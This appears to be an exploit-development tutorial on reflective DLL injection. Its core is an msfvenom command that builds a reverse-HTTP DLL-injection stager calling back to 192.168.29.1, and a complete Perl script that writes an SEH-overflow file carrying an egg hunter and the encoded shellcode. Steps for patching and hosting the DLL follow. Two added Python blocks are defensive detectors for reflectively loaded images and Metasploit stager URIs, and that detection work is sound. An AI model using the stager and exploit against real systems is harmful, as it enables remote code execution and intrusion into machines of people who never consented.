Exploit Development 5: Reflective DLL Injection

Introduction

Reflective DLL injection loads a DLL into a process without reading it from disk. A stager runs from the exploited buffer and retrieves the DLL from a server; the DLL is then loaded and mapped directly into the process address space and execution is handed to its entry point.
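Because the DLL never passes through LoadLibrary, it is not registered in the process's module list, which is what makes the technique hard to spot and what a detector has to work around. The following Python is an added example, not code from the original post: a memory-scan heuristic that flags executable, privately allocated regions with no backing file whose first bytes form a valid MZ/PE header, the footprint a manually mapped image leaves behind. The MemoryRegion records and the region list are constructed for the example; on a live Windows host they would be filled from VirtualQueryEx, GetMappedFileName and ReadProcessMemory (an assumption about how the caller would use it).

```python
"""Heuristic check for reflectively loaded DLLs: an executable, privately
allocated memory region (no backing file) that starts with a PE header.

Added example; the region list is constructed inline, not read from a real
process. The protection and type constants are the winnt.h values."""
import struct
from dataclasses import dataclass

MEM_PRIVATE = 0x20000            # MEM_PRIVATE
MEM_IMAGE = 0x1000000            # MEM_IMAGE: region backed by a mapped image
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE_MASK = 0xF0           # all PAGE_EXECUTE* values live in the high nibble


@dataclass
class MemoryRegion:
    base: int
    protect: int
    region_type: int
    mapped_file: str   # "" when no file backs the region
    data: bytes        # first bytes of the region, as read from the process


def has_pe_header(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def is_executable(protect: int) -> bool:
    return (protect & EXECUTABLE_MASK) != 0


def find_suspicious_regions(regions):
    """Return regions that look like a manually mapped (reflectively loaded) image."""
    hits = []
    for r in regions:
        unbacked = r.region_type != MEM_IMAGE and not r.mapped_file
        if unbacked and is_executable(r.protect) and has_pe_header(r.data):
            hits.append(r)
    return hits


def fake_pe_header(e_lfanew: int = 0x80) -> bytes:
    """Constructed test data: a minimal MZ stub with a PE signature at e_lfanew."""
    hdr = bytearray(e_lfanew + 4)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    return bytes(hdr)


# Constructed sample: the main module (legitimate), a heap region, a privately
# allocated RWX region carrying a PE header, and an RWX region without one.
SAMPLE_REGIONS = [
    MemoryRegion(0x00400000, PAGE_EXECUTE_READ, MEM_IMAGE, r"C:\app\target.exe", fake_pe_header()),
    MemoryRegion(0x01A30000, PAGE_READWRITE, MEM_PRIVATE, "", b"\x00" * 0x100),
    MemoryRegion(0x02F10000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, "", fake_pe_header()),
    MemoryRegion(0x03000000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, "", b"\x90" * 0x100),
]

if __name__ == "__main__":
    for r in find_suspicious_regions(SAMPLE_REGIONS):
        print(f"unbacked executable PE image at 0x{r.base:08x}")
```

The check keys on the PE header still being present at the start of the region, so it is a triage signal rather than proof: JIT compilers and some packers also produce executable private memory, and a loader that does not leave the header behind is not caught by it. Pair it with the process's network and file activity before acting on a hit.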

To understand how in-memory DLL injection evolved, I recommend reading the following two papers in the given order:

Setup

We’ll use the exploit from the previous egg hunting tutorial.

Implementation

Stager

Metasploit offers several stagers that retrieve and inject a DLL. This tutorial uses the reverse HTTP stager.

Generate the payload as follows:

msfvenom -p windows/dllinject/reverse_http lhost=192.168.29.1 lport=80 dll=. -e x86/shikata_ga_nai -b '\x00\x1a' -f perl

Insert the generated shellcode into the exploit script:

use strict;
use warnings;

my $file = "attack_test.txt";

# Bytes up to the saved return address, the EIP placeholder and filler up to
# the SEH record (layout taken from the previous egg hunting tutorial)
my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";
my $fill = "B" x 52;

# nSEH: short jump (EB 06) over the handler address into the egg hunter
my $nextseh = "\xeb\x06\x90\x90";
# SEH handler overwrite (address from the egg hunting tutorial)
my $seh = pack('V',0x123418D4);
my $padding = "\x90" x 0x29;

# Egg hunter: scans memory for the doubled tag "w00tw00t" and jumps to the
# bytes that follow it
my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# Stager generated by msfvenom (windows/dllinject/reverse_http, encoded with
# shikata_ga_nai); it retrieves the reflective DLL and maps it in memory
my $reverse_http_stager =
"\xb8\xc9\xb5\x30\xb9\xdb\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" .
"\xb1\x5e\x31\x45\x15\x03\x45\x15\x83\xc5\x04\xe2\x3c\x49" .
"\xd8\x3b\xbe\xb2\x19\x5c\x37\x57\x28\x5c\x23\x13\x1b\x6c" .
"\x20\x71\x90\x07\x64\x62\x23\x65\xa0\x85\x84\xc0\x96\xa8" .
"\x15\x78\xea\xab\x95\x83\x3e\x0c\xa7\x4b\x33\x4d\xe0\xb6" .
"\xb9\x1f\xb9\xbd\x6f\xb0\xce\x88\xb3\x3b\x9c\x1d\xb3\xd8" .
"\x55\x1f\x92\x4e\xed\x46\x34\x70\x22\xf3\x7d\x6a\x27\x3e" .
"\x34\x01\x93\xb4\xc7\xc3\xed\x35\x6b\x2a\xc2\xc7\x72\x6a" .
"\xe5\x37\x01\x82\x15\xc5\x11\x51\x67\x11\x94\x42\xcf\xd2" .
"\x0e\xaf\xf1\x37\xc8\x24\xfd\xfc\x9f\x63\xe2\x03\x4c\x18" .
"\x1e\x8f\x73\xcf\x96\xcb\x57\xcb\xf3\x88\xf6\x4a\x5e\x7e" .
"\x07\x8c\x01\xdf\xad\xc6\xac\x34\xdc\x84\xb8\xa4\xbb\x42" .
"\x39\x51\x34\xc2\x57\xc8\xee\x7c\xe4\x7d\x28\x7a\x0b\x54" .
"\x05\x5f\xa0\x04\x36\x0c\x14\xc3\x82\xe4\xe3\xb4\x0d\xdd" .
"\x47\xe8\x9b\xdd\x34\x5d\x31\xb2\x52\xc5\xc5\x32\xa3\x29" .
"\x9c\x55\xc4\x04\x57\xe9\x7a\x1e\x12\x69\x30\xaa\x83\x28" .
"\xac\x12\x0b\x9d\x5b\x39\x5c\x70\xce\xff\xc7\x17\x9f\xcf" .
"\x40\x94\x0a\x72\x1f\x67\xf0\x1d\xf2\x32\xa2\x8e\x60\xdb" .
"\x0a\x08\x01\x65\x9b\xd8\xc8\x5e\xad\x1c\x7a\xc9\x06\x94" .
"\xe5\xcf\x56\x73\x90\x16\xfb\x14\xa2\x94\x9c\x60\xf1\xcb" .
"\x0f\x3e\xa6\xbd\xc7\x2b\x1d\x6c\x23\x53\x48\xe6\x39\xa1" .
"\x2d\x54\xed\xe6\x82\x0c\x79\x24\x22\xa9\x02\xc9\xff\x4c" .
"\x34\x40\xf7\x01\xc0\x46\xef\xd7\x2a\x99\xef\x8d\x6a\xf1" .
"\xef\x41\x6b\x01\x87\x61\x6b\x41\x57\x31\x03\x19\xf3\xe6" .
"\x36\x66\x2e\x9b\xea\xca\x59\x7b\x5b\x85\x59\xa4\x64\x55" .
"\x0a\xf2\x0c\x47\x3a\x73\x2e\x98\x97\x01\x6f\x13\xd8\x81" .
"\x77\xdd\x25\x10\xb7\xa8\x4c\x43\xfb\x0c\x66\xff\x04\x4d" .
"\x89\x31\xc2\x80\x5b\x03\x02\xdd\x8d\x51\x53\x33\xe0\x95" .
"\x18\xbb\xb7\x34\x08\x56\xb7\x6b\x4a\x73";

# Write the file: SEH overflow, egg hunter, NOP padding, then the tagged stager.
# binmode keeps the payload bytes intact when the script runs on Windows.
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);
print $FILE $overflow.$eip.$fill.$nextseh.$seh.$egghunter.$padding."w00tw00t".$reverse_http_stager;
close($FILE);
print "File created\n";

Compile Reflective DLL

Get Stephen Fewer's ReflectiveDLLInjection code repository, add your own code and compile it.

Patch Reflective DLL

Normally Metasploit adds a small bootstrapper to the reflective DLL header before delivering it. When the reflective DLL is self-hosted on a web server instead, that patch has to be applied manually.

For this purpose, use Borja Merino's Python script: https://github.com/BorjaMerino/reflectPatcher.py/blob/master/reflectPatcher.py

The script prepends 4 bytes of size information to the actual header. These 4 bytes are not needed with an HTTP stager, so remove them with a hex editor.

Hosting Reflective DLL

The stager issues an HTTP GET request whose path is a random string. Depending on the web server in use, it may be necessary to map that request path to the actual DLL file, using aliases, URL rewriting or other means.
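The request string looks random but is not arbitrary: Metasploit chooses the URI so that its 8-bit checksum (the sum of its bytes modulo 256, after dropping every character outside the base64url set) equals a fixed value, 92 for the Windows stager, which is what the handler uses to recognise a fresh stager and what a defender can look for in the logs of the server that hosts the DLL. The Python below is an added example, not part of the original post; the checksum constants and the character filter mirror Metasploit's uri_checksum module, and the access-log lines are constructed.

```python
"""Flag Metasploit reverse_http stager requests in web-server access logs by
the 8-bit checksum of the request path.

Added example, not from the original post. Constants follow Metasploit's
uri_checksum module; the log lines below are constructed."""
import re

URI_CHECKSUM_INITW = 92   # Windows native stager
URI_CHECKSUM_INITJ = 88   # Java stager
URI_CHECKSUM_INITP = 80   # Python stager
URI_CHECKSUM_CONN = 98    # reconnect of an existing session

KNOWN_CHECKSUMS = {
    URI_CHECKSUM_INITW: "windows stager (INITW)",
    URI_CHECKSUM_INITJ: "java stager (INITJ)",
    URI_CHECKSUM_INITP: "python stager (INITP)",
    URI_CHECKSUM_CONN: "session reconnect (CONN)",
}

# Common/combined log format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3}) ')


def checksum8(s: str) -> int:
    """Sum of the byte values modulo 256 (Rex::Text.checksum8)."""
    return sum(s.encode()) % 0x100


def uri_checksum(path: str) -> int:
    """Checksum of the path with the query string and every non-base64url
    character (including the slashes) removed, as the handler computes it."""
    bare = re.sub(r"[^A-Za-z0-9_\-]", "", path.split("?", 1)[0])
    return checksum8(bare)


def classify_request(path: str):
    """Return the stager label if the path carries a known checksum, else None."""
    return KNOWN_CHECKSUMS.get(uri_checksum(path))


def scan_log(lines):
    """Return (client, path, label) for every request whose path matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, path, _status = m.groups()
        label = classify_request(path)
        if label:
            hits.append((client, path, label))
    return hits


# Constructed sample: an ordinary page, a path whose checksum8 is 92
# ('a'+'Z'+'7'+'j' = 348, 348 mod 256 = 92), and a static asset.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2017:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2017:10:00:03 +0000] "GET /aZ7j HTTP/1.1" 200 233472',
    '10.0.0.7 - - [01/Jan/2017:10:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, path, label in scan_log(SAMPLE_LOG):
        print(f"{client} requested {path}: checksum matches {label}")
```

A random path collides with one of the four constants roughly 1.6% of the time, so a hit is a triage signal rather than a verdict: confirm it against the user agent, a DLL-sized response body and the client's follow-on traffic. Later Metasploit versions also embed a payload UUID in longer URIs, but the leading checksum rule above still applies to them.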

Exploit execution

Run the exploit and watch the DLL injection in action:

(Screenshot: 5-dllinjectionexploit)
